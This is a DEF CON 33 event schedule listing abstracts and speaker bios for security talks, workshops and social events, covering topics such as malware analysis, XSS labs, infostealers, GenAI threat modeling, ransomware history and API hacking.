Interested in malware analysis, reverse engineering, or offensive security? You know setting up a dedicated Windows analysis virtual machine is crucial, but manually installing and configuring countless tools is incredibly time-consuming and complex. Attend this 30-minute demo to discover FLARE-VM, the powerful open-source solution from Mandiant (now part of Google Cloud) that automates this entire process. See firsthand how FLARE-VM drastically simplifies the creation of a comprehensive analysis VM packed with essential reversing and malware analysis tools. Learn why having a ready-to-go analysis environment is indispensable for so many technical cybersecurity roles and how FLARE-VM jump-starts your build!
Speakers:Joshua "jstrosch" Stroschein,Elliot ChernofskyJoshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.
SpeakerBio: Elliot ChernofskyElliot is a senior reverse engineer on Mandiant's FLARE team. Prior to joining the team, he worked as a software reverse engineer and vulnerability researcher for the Department of Defense. He received his master’s in computer science from Georgia Tech and a bachelor’s in electrical engineering from the University of South Florida. Outside of work he enjoys hiking, ping pong, and searching for the strongest coffee on the planet.
- ics Calendar file
As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, one-day training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.
Speakers:Vishal "Vish" Thakur,John "Jlo" LopesVishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.
He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.
SpeakerBio: John "Jlo" LopesJohn Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence and offensive security practices. He has over 20 years industry experience with a proven ability to help organisations defend and protect against cyber threats. John is a member of Institute of Electronic and Electrical Engineers (IEEE), International Information System Security Certification Consortium Inc. (ISC2) and a member of the Information Systems Audit and Control Association (ISACA). John has worked in roles as a part of the Global Incident Response Teams at Salesforce and AWS.
- ics Calendar file
The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity "Access Everything" by gaining you access to the airwaves though free amateur radio license exams! Ham radio has a long history with ham radio operators being considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.
In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.
- ics Calendar file
- ics Calendar file
We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.
- ics Calendar file
We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.
- ics Calendar file
XSS in modern React apps isn't gone, it's just hiding in new places. In this workshop, we'll expose how React createElement can be your way in. We'll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You'll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.
SpeakerBio: Nick CopiNick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture the flag or other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter's Guild, and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people's "nearly exploitable bugs" as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull ups on iframe jungle gyms.
- ics Calendar file
In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.
SpeakerBio: Megan SquireDr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.
- ics Calendar file
This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as - prompt injection, data poisoning, and model leakage. Working in teams, you'll threat model a GenAI system using simplified STRIDE and Rapid threat prototyping techniques and visual diagrams.
The second half flips the script: you'll build lightweight security tools that harness GenAI for good crafting utilities. No prior AI experience is required; everything is explained as we go.
This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop - we’ll supply the rest.
You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.
Speakers:Ashwin Iyer,Ritika VermaAshwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.
Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.
Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC’s segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics like GenAI threat modeling, Practical Threat Modeling for Agile.
He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP and few others. When not hacking cloud platforms or vendor portals, he’s mentoring teams on how to think like attackers.
SpeakerBio: Ritika Verma, AI Security Research AssistantRitika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.
Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.
She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.
- ics Calendar file
Everyone loves breaking in—but that’s just step 7 out of 10. This session explores what it really takes to run a physical pen test that's not just exciting, but also safe, smart, and worth the money for your company or client. We'll follow the full journey - from breach-focused OSINT and recon, to delivering findings that teams act on. Expect war stories, dumb mistakes, and smart takeaways as you learn how to turn a good break-in into a lasting impact.
SpeakerBio: ShawnToo many security programs bring a clipboard to a gunfight. Shawn helps companies match and defend against the adversary's tactics - no firearms required. As an adversary for hire, Shawn leads physical red teams that test Fortune 100s, government agencies, and critical infrastructure. He started the largest physical red team in Silicone Valley and teaches security risk management and red teaming to cybersecurity graduate students. From fake badges to forged businesses, kidnapping executives to smuggling weapons, he runs ops that find the gaps in physical security before the bad guys do.
- ics Calendar file
The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.
Speakers:Monnappa "Monnappa22" K A,Sajan ShettyMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
SpeakerBio: Sajan ShettySajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
- ics Calendar file
The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.
Speakers:Monnappa "Monnappa22" K A,Sajan ShettyMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
SpeakerBio: Sajan ShettySajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
- ics Calendar file
In this talk we will outline the various layers of security in payment systems and using generative AI for "fuzz testing" these systems. We will cover image and video manipulation, testing unusual combinations of security elements in payment messages and testing various risky behaviour scenarios in common payment types in both fraud and money laundering scenarios.
Speakers:Karthik Tadinada,Martyn HigsonKarthik is the founder and CEO of Fortify Solutions, a provider of fraud and financial crime prevention solutions. Karthik has over a dozen years of experience in building fraud prevention systems at international scale, having built systems for IATA, EFhe debit card network of Australia), TSYS and WorldPay.
SpeakerBio: Martyn Higson, CTO at Fincrime DynamicsMartyn is CTO at Fincrime Dynamics, a synthetic data company for prevention of fraud and financial crime. Martyn has been responsible for deploying major fraud prevention systems in his prior roles at Featurespace.
- ics Calendar file
War stories and bad moves from those in the field.
Speakers:Graham Helton,Kevin Clark,Red Team Village Staff,Skyler KnechtGraham Helton is currently a Red Team Specialist at Google specializing in Linux exploitation. Graham posts frequently on his website grahamhelton.com with deep dives on various security related topics. In his free time he likes to pretend like he knows what he’s doing, coffee, and cooking.
SpeakerBio: Kevin Clark, Red Team Instructor at BC SecurityKevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
SpeakerBio: Red Team Village StaffSkyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
- ics Calendar file
Yaroslav Vasinskyi was sentenced in 2024 to 13 years in U.S. federal prison for his role in the $700M Kaseya ransomware attack. But behind the headlines lies a more human and complex story. Over the past year, threat researcher Jon DiMaggio built a relationship with Vasinskyi, speaking with him regularly by phone and email. Joining him is John Fokker, Head of Threat Intelligence at Trellix and former Dutch cybercrime investigator involved in operations targeting the REvil gang with global law enforcement.
This talk reveals how REvil operated from the inside, what really happened behind the Kaseya attack, and how ego, greed, and betrayal tore the crew apart. The session also provides new information on the group’s leadership, who vanished and remain at large.
This isn’t theory or speculation. It is raw human intelligence, operational insight, and criminal context behind one of the most devastating ransomware attacks in history. It also tells Vasinskyi’s personal journey, revealing the often overlooked human side of ransomware crime.
Coinciding with the next Ransomware Diaries release, this talk exposes the inner workings and unraveling of one of the most infamous ransomware groups of all time. This is not a glorification, it is a reckoning.
References:
Jon DiMaggio is the Chief Security Strategist at Analyst1 and a cybercrime hunter who doesn’t just follow ransomware gangs, he infiltrates them. A former U.S. intelligence analyst with a background in signals intelligence, Jon has spent his career going deep undercover inside some of the world’s most dangerous cybercrime syndicates. In 2024, he embedded himself within the notorious LockBit ransomware gang, gathering intelligence that helped law enforcement take down one of the most prolific cybercriminal operations in history.
His investigative series The Ransomware Diaries exposed LockBit’s inner workings and earned widespread recognition. Jon is the author of The Art of Cyberwarfare (No Starch Press), a two-time SANS Difference Makers Award winner, has appeared on 60 Minutes, and has been featured in The New York Times, Wired, and Bloomberg. He is also a regular speaker at DEFCON, RSA, and other major security conferences. Whether he’s chasing cybercriminals or telling their stories, Jon brings the kind of firsthand insight you only get when you’ve walked into the lion’s den, and walked out.
SpeakerBio: John FokkerAs Head of Threat Intelligence at Trellix and former head of cyber investigations at the Dutch National High Tech Crime Unit, I bring deep technical knowledge and operational experience bridging law enforcement, intelligence, and private sector perspectives. My work has helped coordinate international takedowns of ransomware infrastructure, and I have direct experience investigating REvil and its affiliates at the height of their operations. My contribution complements Jon’s HUMINT narrative with:
• Technical validation of the behind-the-scenes activities discussed in the talk
• Law enforcement and intelligence insights on affiliate operations, infrastructure, and monetization patterns
• An investigative trail linking Revil and GandCrab, through shared TTPs and operational overlaps
Together, our presentation fuses Hacking, CTI, HUMINT and investigative storytelling with forensic rigor, revealing how trust, betrayal, and ego brought down one of the most feared ransomware gangs in the world.
- ics Calendar file
Glytch is a post-exploitation tool serving as a command-and-control and data exfiltration service. It creates a covert channel through Twitch live streaming platform and lets attackers execute OS commands or exfiltrate data of any kind from the target computer, regardless of whether the computers are connected over a LAN or WAN.
Speakers:Anil Celik,Emre OdamanAnil graduated as a computer engineer and is currently an MSc student in information security engineering. He has 5+ years of professional experience and is working as a cyber security engineer at HAVELSAN, primarily focused on red team engagements and purple teaming. He holds 5+ CVEs and has OSCP and OSWP certifications.
SpeakerBio: Emre OdamanGraduated as a Computer Engineer and working as a Cyber Security Engineer at HAVELSAN for the past 3 years, which is a major defense industry company in Türkiye. His main areas of interest are red teaming, network security, OT, IoT & hardware security.
- ics Calendar file
Over the past few years, we've really seen API hacking take off as a field of its own, diverging from typical web app security, but yet parallel to it. Often we point to the amorphous blob that is web security and go: "here you go, now you can be a hacker too", with top 10 lists, write-ups, conference talks and whitepapers smiling as we do. This creates a major challenge for developers who want to test their APIs for security or just people who want to get into API hacking, how on earth do you wade through all the general web security to get to the meat of API hacking, what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking, from the bugs you can find and to the impact you can cause, to how you can easily test your own work or review your peers. So what are you waiting for join me and go hack yourself!
SpeakerBio: Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by HarnessDr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.
- ics Calendar file
- ics Calendar file
Returning for their 8th year, Gothcon invites you to come dance the night away with a line-up of some of the community's best dark dance music DJ's from across the US! Dress however you would like in whatever makes you feel comfortable and happy, and all are welcome.
- ics Calendar file
Join the founding members of Red Team Village as they share what they’ve learned building a community focused on offensive security education and discuss their evolution from hands-on leaders to mentors and advisors. From starting as a DEF CON village to growing into a 20,000+ member community, the founders will explore the complexities of building a successful community as well as the transition to letting others lead day-to-day operations.
This session covers the practical realities of community building and leadership evolution - managing volunteers, scaling membership, balancing content for different skill levels, and maintaining community culture during growth. The founders will share what worked in running the village operations, handling logistics at scale, and responding to community feedback to continuously improve the experience.
The discussion will address key questions about running and transitioning technical communities: How do you manage village operations effectively? What have you learned about scaling community management? How do you handle criticism and feedback constructively? How do you identify and develop new leaders? When and how do you step back without losing community culture? The founders will also cover practical aspects like managing large-scale events and evolving with community needs.
The session wraps up with Q&A where you can explore specific challenges around building technical communities, leadership transitions, and maintaining founding vision while empowering new voices.
Whether you’re involved in community building, thinking about starting something new, or wondering about sustainable leadership models, this panel offers honest perspectives from founders navigating the transition from builders to advisors.
Speakers:Barrett Darnell,Mike Lisi,Omar Santos,Savannah Lazzara,Wes ThurnerMike Lisi is the founder of Maltek Solutions, a consulting and solutions company as well as a seasoned professional in the field of cybersecurity. Mike is known for his expertise in network, web application, and API penetration testing, his contributions toward Capture The Flag (CTF) events, and support for college cybersecurity competitions. As the founder of Maltek Solutions, Michael has carved a path of excellence, establishing a dynamic and innovative cybersecurity company. His leadership and technical expertise drive Maltek Solutions to deliver top-notch security solutions to customers and partners throughout the country.
SpeakerBio: Omar SantosOmar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
SpeakerBio: Savannah LazzaraSavannah Lazzara is a Security Engineer specializing in red teaming at a tech company. Savannah has multiple years of experience in security consulting working with many Fortune 500 corporations and has experience in carrying out security assessments, which include network assessments, social engineering exercises, physical facility penetration tests, and wireless assessments. Savannah also has experience in performing adversary simulation assessments, which include remote red team simulations, insider threat assessments, and onsite red team assessments. Savannahs area of expertise is focused on social engineering and physical security.
Savannah is a member of the Advisory Board for Red Team Village and co-authored ‘Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-Driven World’. She has spoken at several cybersecurity conferences, including Source Zero Con, BSides, and more. Savannah has also appeared on multiple podcasts, including The Hacker Factor and Hackerz and Haecksen.
SpeakerBio: Wes Thurner
- ics Calendar file
This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.
- ics Calendar file
What is Hack3r Runw@y?
Hack3r Runw@y challenges creative minds in the hacker community to reimagine fashion through the lens of hacking. We're calling all glamorous geeks, crafty coders, and fashionably functional folks to dust off their soldering irons, grab their needles and threads, and unleash their inner designers. Whether you're a seasoned maker or a coding newbie, Hack3r Runw@y has a place for you. Hint: You don't have to know how to program to make cool wearables.
What to Expect:
Participants will submit their creations prior to the event and then walk the runway during our allotted time at DEF CON. Audience should be prepared to be amazed by a runway show unlike any other. Like really. Witness creations that push the boundaries of fashion and technology, showcasing the ingenuity and resourcefulness of the hacker community.
Expect to see:
Smart Wear that Wows: Garments integrated with LEDs, microcontrollers, sensors, and other tech wizardry, creating dazzling displays of functionality and style. Digital Design that Dazzles: Visually stunning pieces that use light, color, and texture to create captivating, passive designs.
Functional Fashion: Practical and stylish creations that solve real-world problems, from masks and shields to lockpick earrings and cufflink shims.
Extraordinary Style: Unique and expressive designs that push the boundaries of fashion, incorporating everything from 3D textures and optical illusions to cosplay and security-inspired patterns.
A Hacker Perspective on Fashion:
Hack3r Runw@y brings a unique hacker perspective to DEF CON by demonstrating the power of creativity and problem-solving in a non-traditional context. It showcases how hacking can be applied to art and self-expression, blurring the lines between technology, fashion, and culture. It's about more than just making cool gadgets; it's about pushing boundaries, challenging conventions, and exploring the intersection of technology and human experience.
What You'll Learn:
Hack3r Runw@y offers attendees a glimpse into the creative potential of the hacker community. You'll see firsthand how technical skills can be combined with artistic vision to create truly unique and innovative designs. You'll be inspired by the ingenuity and resourcefulness of the participants, and you might even pick up some ideas for your own projects. It's a chance to learn about new technologies, see them applied in unexpected ways, and connect with a community of like-minded individuals. Hack3r Runw@y teamed up with the DC Maker Community during DEF CON 32 to offer a workshop on sewing LEDs to clothing. Look out for something similar this year.
The Competition:
Participants will compete in four categories for a chance to win in each, plus the coveted People’s Choice trophy, where anyone can win, but there will be a twist! Our esteemed judges will select winners based on:
Join us at DEF CON 33 for Hack3r Runw@y and witness the future of fashion! Be prepared to be amazed, inspired, and maybe even a little bit hacked. This is an event you won't want to miss!
There are no prerequisites outside of you wearing something that you made or had a hand in making. You are welcome to model store bought outfits, but you will not qualify for a prize.
Proof that you created the item and signed up via the google form. Submissions due no later than 4pm EST on Saturday, August 10, 2024. Link to form found here: https://hack3rrunway.github.io/
- ics Calendar file
Have you ever wondered what would happen if you took ostensibly smart people, put them up on a stage, maybe provided a beer or two and started asking really tough technical questions like what port Telnet runs on? Well wonder no more! Back to start its 31st year at Defcon, Hacker Jeopardy will have you laughing, groaning and wondering where all the brain cells have gone. Some come share an evening of chanting DFIU followed immediately by someone FIU. This is a mature show, 18+.
None
No
- ics Calendar file
Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Everyone is encourage to participate in a DEF CON tradition from all folks and skill levels.
- ics Calendar file
Enter the Hacker Troll House to take on a variety of entry-level Linux security challenges against the Trolls. The Hacker Troll House challenges are short, timed, and will require you to think on your feet to beat the Trolls at their own game. But be warned, Trolls don't play fair! Basic Linux command line and file system knowledge recommended (bash scripting a plus).
SpeakerBio: James RiceMr. James Rice has been cybersecurity faculty for the last decade in Upstate New York at Mohawk Valley Community College and more recently Rochester Institute of Technology. During this time, Mr. Rice has focused on developing numerous interactive gamified learning scenarios for the classroom and cyber competitions such as the NSA sponsored NCAE Cyber Games. Mr. Rice is currently pursuing his PhD at RIT in Computer Engineering and researching how to best leverage immersive reality technologies for data visualization and interaction, primarily in cyberspace.
- ics Calendar file
The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs anonymize traffic but still expose IP addresses. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor networks reroute traffic, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms but in a proprietary and siloed way. Open source means very little if an app operates in a Walled Garden. Are there back doors? Is our data really safe?
In this workshop we'll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We'll use modern-day PQC encryption to implement a secure protocol. We'll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We'll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We'll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you'll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?
Yes, the Internet is a dangerous place. But it's much safer when we take control.
Speakers:Eijah,Benjamin "Cave Twink" WoodillEijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world's first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
SpeakerBio: Benjamin "Cave Twink" WoodillBenjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.
- ics Calendar file
Information stealer malware is one of the most prolific and damaging threats in today’s cybercrime landscape, siphoning off everything from browser-stored credentials to session tokens. In 2024 alone, we witnessed more than 30 million stealer logs traded on underground markets. Yet buried within these logs is a goldmine: screenshots captured at the precise moment of infection. Think of it as a thief taking a selfie mid-heist, unexpected but convenient for us, right? Surprisingly, these crime scene snapshots have been largely overlooked until now. Leveraging them with Large Language Models (LLMs), we propose a new approach to identify infection vectors, extract indicators of compromise (IoCs) and track infostealer campaigns at scale. In our analysis, we will break down three distinct campaigns to illustrate their tactics to deliver malware and deceive victims.
With its live demonstration, this presentation shows how LLMs can be harnessed to extract IoCs at scale while addressing the challenges and costs of implementation. Attendees will walk away with a deeper understanding of the modern infostealer ecosystem and will want to apply LLM to any illicit artifacts to extract actionable intelligence.
Speakers:Olivier Bilodeau,Estelle RuellanOlivier Bilodeau, a principal researcher at Flare, brings 15+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. Passionate communicator, Olivier spoke at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontréHack, is NorthSec’s President, and runs its Hacker Jeopardy.
SpeakerBio: Estelle RuellanEstelle is a Threat Intelligence Researcher at Flare. With a background in Mathematics and Criminology, Estelle lost her way into cybercrime and is now playing with lines of code to help computers make sense of the cyber threat landscape. She presented at conferences like ShmooCon 2025, Hack.lu 2024, eCrime APWG 2024 in Boston and the 23rd Annual European Society of Criminology Conference (EUROCRIM 2023) in Florence.
- ics Calendar file
